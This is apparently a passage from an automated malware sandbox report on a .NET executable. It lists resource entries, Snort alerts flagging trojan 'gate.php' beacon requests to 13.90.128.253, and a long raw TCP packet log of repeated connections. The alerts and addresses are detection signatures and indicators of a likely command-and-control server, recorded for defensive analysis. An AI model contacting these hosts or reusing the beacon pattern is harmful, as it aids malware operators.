                                                                                                              RT_ICON0x86f080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors
                                                                                                              RT_ICON0x874700x353PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              RT_ICON0x877c40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224
                                                                                                              RT_ICON0x8886c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088
                                                                                                              RT_GROUP_ICON0x88cd40x68data
                                                                                                              RT_VERSION0x88d3c0x2f0SysEx File - IDP
                                                                                                              RT_MANIFEST0x8902c0x1f7XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              192.168.2.513.90.128.25349698802022986 11/24/22-10:05:39.916527TCP2022986ET TROJAN Generic Request to gate.php Dotted-Quad4969880192.168.2.513.90.128.253
                                                                                                              192.168.2.513.90.128.25349701802022818 11/24/22-10:05:49.419418TCP2022818ET TROJAN Generic gate .php GET with minimal headers4970180192.168.2.513.90.128.253
                                                                                                              192.168.2.513.90.128.25349696802022986 11/24/22-10:05:31.007346TCP2022986ET TROJAN Generic Request to gate.php Dotted-Quad4969680192.168.2.513.90.128.253
                                                                                                              192.168.2.513.90.128.25349692802022986 11/24/22-10:05:25.056792TCP2022986ET TROJAN Generic Request to gate.php Dotted-Quad4969280192.168.2.513.90.128.253
                                                                                                              192.168.2.513.90.128.25349698802022818 11/24/22-10:05:39.916527TCP2022818ET TROJAN Generic gate .php GET with minimal headers4969880192.168.2.513.90.128.253
                                                                                                              192.168.2.513.90.128.25349701802022986 11/24/22-10:05:49.419418TCP2022986ET TROJAN Generic Request to gate.php Dotted-Quad4970180192.168.2.513.90.128.253
                                                                                                              192.168.2.513.90.128.25349696802022818 11/24/22-10:05:31.007346TCP2022818ET TROJAN Generic gate .php GET with minimal headers4969680192.168.2.513.90.128.253
                                                                                                              192.168.2.513.90.128.25349692802022818 11/24/22-10:05:25.056792TCP2022818ET TROJAN Generic gate .php GET with minimal headers4969280192.168.2.513.90.128.253

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 24, 2022 10:05:03.994479895 CET4968880192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:04.026755095 CET8049688208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:04.026866913 CET4968880192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:04.028804064 CET4968880192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:04.061831951 CET8049688208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:04.102684021 CET4968880192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:11.913038969 CET4968880192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:11.945188999 CET8049688208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:11.945281029 CET4968880192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:11.961788893 CET4968980192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:11.994003057 CET8049689208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:11.994191885 CET4968980192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:11.995855093 CET4968980192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:12.028294086 CET8049689208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:12.071954966 CET4968980192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:14.053586960 CET4968980192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:14.086812019 CET8049689208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:14.086971045 CET4968980192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:14.114914894 CET4969080192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:14.147301912 CET8049690208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:14.147495031 CET4969080192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:14.147728920 CET4969080192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:14.181540966 CET8049690208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:14.228399992 CET4969080192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:23.511710882 CET4969180192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:23.543901920 CET8049691208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:23.544029951 CET4969180192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:23.544753075 CET4969180192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:23.579479933 CET8049691208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:23.619889975 CET4969180192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:24.940659046 CET4969080192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:24.942090034 CET4969280192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:24.972805023 CET8049690208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:24.976339102 CET4969080192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:25.043502092 CET804969213.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:25.049285889 CET4969280192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:25.056792021 CET4969280192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:25.158010960 CET804969213.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:25.227658033 CET804969213.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:25.416857958 CET4969280192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:25.769961119 CET4969280192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:25.870934963 CET804969213.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:25.876641035 CET804969213.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:25.916852951 CET4969280192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:29.175508022 CET4969380192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:29.207568884 CET8049693208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:29.207690954 CET4969380192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:29.208549976 CET4969380192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:29.242099047 CET8049693208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:29.323426008 CET4969380192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:30.166615963 CET4969180192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:30.198693037 CET8049691208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:30.198816061 CET4969180192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:30.251305103 CET4969480192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:30.283247948 CET8049694208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:30.283442020 CET4969480192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:30.283818960 CET4969480192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:30.317295074 CET8049694208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:30.417273998 CET4969480192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:30.672163010 CET4969580192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:30.704122066 CET8049695208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:30.704407930 CET4969580192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:30.704683065 CET4969580192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:30.759912014 CET8049695208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:30.877736092 CET804969213.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:30.877823114 CET4969280192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:30.901930094 CET4969280192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:30.903006077 CET4969680192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:30.917299032 CET4969580192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:31.003175020 CET804969213.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:31.006994963 CET804969613.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:31.007124901 CET4969680192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:31.007345915 CET4969680192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:31.108366013 CET804969613.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:31.170663118 CET804969613.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:31.323575974 CET4969680192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:34.650249004 CET4969680192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:34.751559019 CET804969613.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:34.803006887 CET804969613.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:35.027559042 CET4969680192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:39.180665970 CET4969580192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:39.181086063 CET4969480192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:39.378040075 CET4969780192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:39.407625914 CET8049697208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:39.407780886 CET4969780192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:39.421231031 CET4969780192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:39.459541082 CET8049697208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:39.605515957 CET4969780192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:39.805701971 CET804969613.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:39.806757927 CET4969680192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:39.811291933 CET4969680192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:39.813853979 CET4969880192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:39.913072109 CET804969613.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:39.916162968 CET804969813.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:39.916273117 CET4969880192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:39.916527033 CET4969880192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:40.018237114 CET804969813.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:40.072050095 CET804969813.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:40.214972019 CET4969880192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:41.967474937 CET4969380192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:41.999300957 CET8049693208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:41.999398947 CET4969380192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:42.040324926 CET4969980192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:42.070235968 CET8049699208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:42.070327997 CET4969980192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:42.070610046 CET4969980192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:42.108103037 CET8049699208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:42.230731010 CET4969980192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:43.076862097 CET4969880192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.077802896 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.178035021 CET804969813.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.178160906 CET4969880192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.179263115 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.179658890 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.179892063 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.284292936 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.356317997 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.367906094 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.469566107 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.471673012 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.475372076 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.475536108 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.475636959 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.577122927 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.577157021 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.577341080 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.577456951 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.678909063 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.678985119 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.679028034 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.679069042 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.679079056 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.679152966 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.679181099 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.679234028 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.679234028 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.679275036 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.679275036 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.723428011 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.723536968 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.781045914 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781104088 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781119108 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781137943 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781148911 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781219959 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781239033 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781250954 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781341076 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.781449080 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781467915 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781482935 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781495094 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781675100 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.781765938 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.781812906 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781830072 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781846046 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.781851053 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.781924963 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.782008886 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.782058954 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.782075882 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.782088995 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.782202959 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.782310009 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.782402992 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.782516956 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.825047970 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.825202942 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.883162975 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883192062 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883208036 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883224964 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883241892 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883259058 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883275032 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883337021 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883354902 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883367062 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883440018 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883459091 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.883549929 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883567095 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883583069 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883599997 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883618116 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883635044 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883713007 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883759022 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.883833885 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883851051 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883878946 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883898973 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883913994 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.883964062 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.884006023 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884021997 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884069920 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.884119034 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884135962 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884151936 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884167910 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884172916 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.884262085 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884274960 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.884277105 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884366989 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.884397030 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884413004 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884428978 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884454966 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.884475946 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884491920 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884557009 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.884613991 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884630919 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884641886 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.884643078 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884654999 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.884757042 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.884843111 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.884963036 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.885061979 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.885165930 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.885270119 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.885364056 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.885463953 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.885560989 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.885641098 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.929234028 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.930016994 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.943057060 CET4969980192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:43.986202955 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.986233950 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.986476898 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.987565041 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.987581015 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.987617016 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.987761974 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.987782955 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.987797976 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.987812996 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.987859964 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.987889051 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.987901926 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.987919092 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.987973928 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.987979889 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.987979889 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.988044977 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.988044977 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.988061905 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.988065004 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.988070965 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.988099098 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.988179922 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.989347935 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.989367962 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.989386082 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.989403009 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.989420891 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.989438057 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.989454985 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:43.989511967 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.989562035 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:43.989629030 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.031397104 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.031452894 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.031559944 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.031646013 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088150978 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088223934 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088267088 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088306904 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088347912 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088390112 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088430882 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088434935 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088471889 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088512897 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088529110 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088552952 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088573933 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088573933 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088593006 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088629961 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088633060 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088629961 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088679075 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088679075 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088723898 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088723898 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088732004 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088772058 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.088861942 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088905096 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.088936090 CET804970013.90.128.253192.168.2.5
